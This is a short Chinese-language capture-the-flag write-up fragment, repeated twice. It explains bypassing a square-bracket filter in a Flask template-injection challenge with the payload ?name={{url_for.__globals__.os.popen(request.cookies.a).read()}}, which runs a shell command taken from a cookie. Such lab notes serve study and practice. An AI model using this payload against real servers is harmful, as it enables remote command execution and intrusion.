EXP
这道题过滤方括号,所以就重构了之前的payload,这次使用flask内置的函数url_for来触发__globals__
payload
?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}这里面刚好用os模块,所以就可以来直接os.popen
这道题过滤方括号,所以就重构了之前的payload,这次使用flask内置的函数url_for来触发__globals__
payload
?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}这里面刚好用os模块,所以就可以来直接os.popen